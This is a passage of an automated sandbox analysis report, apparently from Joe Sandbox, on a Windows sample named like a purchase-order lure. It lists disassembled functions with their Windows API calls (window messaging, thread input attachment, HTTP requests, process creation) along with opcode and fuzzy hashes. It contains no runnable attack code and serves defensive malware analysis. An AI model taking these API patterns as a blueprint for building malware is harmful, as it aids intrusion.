                                                                                                              • Opcode Fuzzy Hash: 083cf33a3a6ea93cc6a369d3287f6628038f2aec8942be55ed01ecb1d93834c4
                                                                                                              • Instruction Fuzzy Hash: 6321C1B4E00104BFCF05ABA5CC86EFEBB75EF49300B10012AF651972E1DBB95856DB69
                                                                                                              Function 0041B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0041BA73
                                                                                                              • GetDlgCtrlID.USER32 ref: 0041BA7E
                                                                                                              • GetParent.USER32 ref: 0041BA9A
                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 0041BA9D
                                                                                                              • GetDlgCtrlID.USER32(?), ref: 0041BAA6
                                                                                                              • GetParent.USER32(?), ref: 0041BAC2
                                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 0041BAC5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$CtrlParent
                                                                                                              • String ID: ComboBox$ListBox
                                                                                                              • API String ID: 1383977212-1403004172
                                                                                                              • Opcode ID: b8566b99844416af3a77f10f1e44a02e0d76a3b2e89b4c24af7974794d045b6b
                                                                                                              • Instruction ID: 035c900ecb94d3b0927e930ebe94fd9a5640964468c068b11919d54a47a93b24
                                                                                                              • Opcode Fuzzy Hash: b8566b99844416af3a77f10f1e44a02e0d76a3b2e89b4c24af7974794d045b6b
                                                                                                              • Instruction Fuzzy Hash: 142103B0E00104BFCF01AB65CC81EFEBB79EF44300F100116F551972A1EBB95856DB69
                                                                                                              Function 0041BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetParent.USER32 ref: 0041BAE3
                                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 0041BAF8
                                                                                                              • _wcscmp.LIBCMT ref: 0041BB0A
                                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0041BB85
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                              • API String ID: 1704125052-3381328864
                                                                                                              • Opcode ID: cfa2b9a05bace319f656fc0128bb0cd5f0f0f60115f18bf55490a1d7367ae09e
                                                                                                              • Instruction ID: fad6ba9769015deaf0b52115062b2f89b8f42ddcf0ecfba6001270c0953e595c
                                                                                                              • Opcode Fuzzy Hash: cfa2b9a05bace319f656fc0128bb0cd5f0f0f60115f18bf55490a1d7367ae09e
                                                                                                              • Instruction Fuzzy Hash: 4811C1B6A4C303F9FA247621DC06EE63B98DB11324F200037F904E58E5FBED6891559D
                                                                                                              Function 0043B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VariantInit.OLEAUT32(?), ref: 0043B2D5
                                                                                                              • CoInitialize.OLE32(00000000), ref: 0043B302
                                                                                                              • CoUninitialize.OLE32 ref: 0043B30C
                                                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 0043B40C
                                                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 0043B539
                                                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0043B56D
                                                                                                              • CoGetObject.OLE32(?,00000000,0046D91C,?), ref: 0043B590
                                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 0043B5A3
                                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0043B623
                                                                                                              • VariantClear.OLEAUT32(0046D91C), ref: 0043B633
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                              • String ID:
                                                                                                              • API String ID: 2395222682-0
                                                                                                              • Opcode ID: 5889a40948a83698f052dc6196daee6d3bc0aac946c9c2e448b6062ef4c76a07
                                                                                                              • Instruction ID: a76a0f5af902487de0503745e609481afc53709cda217b75f5c5768440e61d77
                                                                                                              • Opcode Fuzzy Hash: 5889a40948a83698f052dc6196daee6d3bc0aac946c9c2e448b6062ef4c76a07
                                                                                                              • Instruction Fuzzy Hash: 9AC11471608305AFC700DF65C884A6BB7E9FF88308F00491EFA8A9B251DB75ED05CB96
                                                                                                              Function 0040ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __lock.LIBCMT ref: 0040ACC1
                                                                                                                • Part of subcall function 00407CF4: __mtinitlocknum.LIBCMT ref: 00407D06
                                                                                                                • Part of subcall function 00407CF4: EnterCriticalSection.KERNEL32(00000000,?,00407ADD,0000000D), ref: 00407D1F
                                                                                                              • __calloc_crt.LIBCMT ref: 0040ACD2
                                                                                                                • Part of subcall function 00406986: __calloc_impl.LIBCMT ref: 00406995
                                                                                                                • Part of subcall function 00406986: Sleep.KERNEL32(00000000,000003BC,003FF507,?,0000000E), ref: 004069AC
                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0040ACED
                                                                                                              • GetStartupInfoW.KERNEL32(?,00496E28,00000064,00405E91,00496C70,00000014), ref: 0040AD46
                                                                                                              • __calloc_crt.LIBCMT ref: 0040AD91
                                                                                                              • GetFileType.KERNEL32(00000001), ref: 0040ADD8
                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0040AE11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                              • String ID:
                                                                                                              • API String ID: 1426640281-0
                                                                                                              • Opcode ID: 5596281925ac789c494c2d5d497d8a4c1644cbd08fc1b611faa81040e9484d30
                                                                                                              • Instruction ID: d9c39c5715d7fa7fe4950bd5bc90255f9fd3b73747b29e130f9afd3c2f57da4a
                                                                                                              • Opcode Fuzzy Hash: 5596281925ac789c494c2d5d497d8a4c1644cbd08fc1b611faa81040e9484d30
                                                                                                              • Instruction Fuzzy Hash: 6981C3B1D053458FDB14CF68C8445AABBF0AF46324B24427ED4A6BB3D1D7389853CB9A
                                                                                                              Function 00424025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00424047
                                                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,004230A5,?,00000001), ref: 0042405B
                                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 00424062
                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004230A5,?,00000001), ref: 00424071
                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00424083
                                                                                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004230A5,?,00000001), ref: 0042409C
                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004230A5,?,00000001), ref: 004240AE
                                                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004230A5,?,00000001), ref: 004240F3
                                                                                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004230A5,?,00000001), ref: 00424108
                                                                                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004230A5,?,00000001), ref: 00424113
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                              • String ID:
                                                                                                              • API String ID: 2156557900-0
                                                                                                              • Opcode ID: 4cc62d2c3cf3d07b809209e254b4a278b144afd26aab0d7044309609f439e125
                                                                                                              • Instruction ID: cad264d27ed33bfe417c2c6e4f0a0024eb6fd7d96d84ced6b65f6a873d5155bd
                                                                                                              • Opcode Fuzzy Hash: 4cc62d2c3cf3d07b809209e254b4a278b144afd26aab0d7044309609f439e125
                                                                                                              • Instruction Fuzzy Hash: 90319572B00324BFDB10DF54EC49B7A7BA9EB95322F508026F905D7290E7B89D808B5D
                                                                                                              Function 0045DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetSysColor.USER32(00000008), ref: 003FB496
                                                                                                              • SetTextColor.GDI32(?,000000FF), ref: 003FB4A0
                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 003FB4B5
                                                                                                              • GetStockObject.GDI32(00000005), ref: 003FB4BD
                                                                                                              • GetClientRect.USER32(?), ref: 0045DD63
                                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0045DD7A
                                                                                                              • GetWindowDC.USER32(?), ref: 0045DD86
                                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0045DD95
                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0045DDA7
                                                                                                              • GetSysColor.USER32(00000005), ref: 0045DDC5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3430376129-0
                                                                                                              • Opcode ID: bd45b497c3211a36b908e13cc9b15e137b4a8e330e9e54eec54837845489027b
                                                                                                              • Instruction ID: 05b9f8c91d32db1f1ccd9e07a4ec19628d606f5b644250ebfebef605e3ec0c10
                                                                                                              • Opcode Fuzzy Hash: bd45b497c3211a36b908e13cc9b15e137b4a8e330e9e54eec54837845489027b
                                                                                                              • Instruction Fuzzy Hash: 71117C71E00205FFDB216FA4ED08BE97B71EB09325F118231FA66950E2EBB14941DF26
                                                                                                              Function 003E3093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003E30DC
                                                                                                              • CoUninitialize.OLE32(?,00000000), ref: 003E3181
                                                                                                              • UnregisterHotKey.USER32(?), ref: 003E32A9
                                                                                                              • DestroyWindow.USER32(?), ref: 00455079
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 004550F8
                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00455125
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                              • String ID: close all
                                                                                                              • API String ID: 469580280-3243417748
                                                                                                              • Opcode ID: ee329ed4af5e13dcac2f2036beffbaff2bde3a46b4099396a99d9ac93c1e0d68
                                                                                                              • Instruction ID: 00b326df1c44070a3ff89f57d17e6d9e5bdeb6cb561b9281d3cd16bcb41742cc
                                                                                                              • Opcode Fuzzy Hash: ee329ed4af5e13dcac2f2036beffbaff2bde3a46b4099396a99d9ac93c1e0d68
                                                                                                              • Instruction Fuzzy Hash: 41914E707002A2CFC716EF15C899B69F3A4FF05705F5442A9E50A6B2A2DB74AE1ACF44
                                                                                                              Function 003FCB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 003FCC15
                                                                                                                • Part of subcall function 003FCCCD: GetClientRect.USER32(?,?), ref: 003FCCF6
                                                                                                                • Part of subcall function 003FCCCD: GetWindowRect.USER32(?,?), ref: 003FCD37
                                                                                                                • Part of subcall function 003FCCCD: ScreenToClient.USER32(?,?), ref: 003FCD5F
                                                                                                              • GetDC.USER32 ref: 0045D137
                                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0045D14A
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0045D158
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0045D16D
                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0045D175
                                                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0045D200
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                              • String ID: U
                                                                                                              • API String ID: 4009187628-3372436214
                                                                                                              • Opcode ID: f92edb058f5c0f996afdc2db5a2c6d4919ac4a384627d886314b2e23f5da284a
                                                                                                              • Instruction ID: bd00bbdb07bb0bdc243332fdebd11043652b0ca51338d855f9fce59fb02e6e1a
                                                                                                              • Opcode Fuzzy Hash: f92edb058f5c0f996afdc2db5a2c6d4919ac4a384627d886314b2e23f5da284a
                                                                                                              • Instruction Fuzzy Hash: 98710230900209DFCF329F64C980ABA7BB5FF48316F14426AED559A2A6C7388C45CF59
                                                                                                              Function 0044ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
                                                                                                                • Part of subcall function 003FB63C: GetCursorPos.USER32(000000FF), ref: 003FB64F
                                                                                                                • Part of subcall function 003FB63C: ScreenToClient.USER32(00000000,000000FF), ref: 003FB66C
                                                                                                                • Part of subcall function 003FB63C: GetAsyncKeyState.USER32(00000001), ref: 003FB691
                                                                                                                • Part of subcall function 003FB63C: GetAsyncKeyState.USER32(00000002), ref: 003FB69F
                                                                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0044ED3C
                                                                                                              • ImageList_EndDrag.COMCTL32 ref: 0044ED42
                                                                                                              • ReleaseCapture.USER32 ref: 0044ED48
                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 0044EDF0
                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0044EE03
                                                                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0044EEDC
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                              • API String ID: 1924731296-2107944366
                                                                                                              • Opcode ID: e37b0313e6a4751f9bd0f5ce39acbea770d7434e567142ed5a51fb44a0bab9d2
                                                                                                              • Instruction ID: ee9e0b13ad6cb0c9393a0283a71682c81b20a10db94f1e15a2ea5d3c59adb471
                                                                                                              • Opcode Fuzzy Hash: e37b0313e6a4751f9bd0f5ce39acbea770d7434e567142ed5a51fb44a0bab9d2
                                                                                                              • Instruction Fuzzy Hash: 3A51AC70604304AFE710DF25CC96F6A7BE4FB88304F144A2EF5959B2E2DBB49904CB56
                                                                                                              Function 004345C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004345FF
                                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0043462B
                                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0043466D
                                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00434682
                                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0043468F
                                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 004346BF
                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00434706
                                                                                                                • Part of subcall function 00435052: GetLastError.KERNEL32(?,?,004343CC,00000000,00000000,00000001), ref: 00435067
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1241431887-3916222277
                                                                                                              • Opcode ID: f1ff4491be5b64a057d80c68a653a12a58f970cd2792e199efb8c857cc4c0dfc
                                                                                                              • Instruction ID: e8d1f40f4cc1c4b3f74a24699f2925d9961d8b4bcf1d78f70f80c30cc453b1e7
                                                                                                              • Opcode Fuzzy Hash: f1ff4491be5b64a057d80c68a653a12a58f970cd2792e199efb8c857cc4c0dfc
                                                                                                              • Instruction Fuzzy Hash: B24180B1A01204BFEB019F50CC86FFB77ACEF4D315F00502AFA019A141E7B8A9448BA9
                                                                                                              Function 0043B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0047DC00), ref: 0043B715
                                                                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0047DC00), ref: 0043B749
                                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0043B8C1
                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0043B8EB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                              • String ID:
                                                                                                              • API String ID: 560350794-0
                                                                                                              • Opcode ID: 68029082bff0543b4877c0b52033775eee32d4145c767ea5c5a92871ab7c5727
                                                                                                              • Instruction ID: e57a1524efd9037b20111018852866c05a6185f51fa20006a890724e84d90d8c
                                                                                                              • Opcode Fuzzy Hash: 68029082bff0543b4877c0b52033775eee32d4145c767ea5c5a92871ab7c5727
                                                                                                              • Instruction Fuzzy Hash: 50F14E75A00219EFCF04EF94C884EAEB7B9FF49315F108459FA05AB250DB75AE42CB94
                                                                                                              Function 004424D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 004424F5
                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00442688
                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004426AC
                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004426EC
                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0044270E
                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0044286F
                                                                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004428A1
                                                                                                              • CloseHandle.KERNEL32(?), ref: 004428D0
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00442947
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 4090791747-0
                                                                                                              • Opcode ID: 335c1c5d926ec012c5a1403d88f73e7eb5d22cc351b5fbe7a6493846d826b170
                                                                                                              • Instruction ID: a8096d95d7b1c9fd88b2a00e388ef1b1d868255f8b2d350b873f4025ae048450
                                                                                                              • Opcode Fuzzy Hash: 335c1c5d926ec012c5a1403d88f73e7eb5d22cc351b5fbe7a6493846d826b170
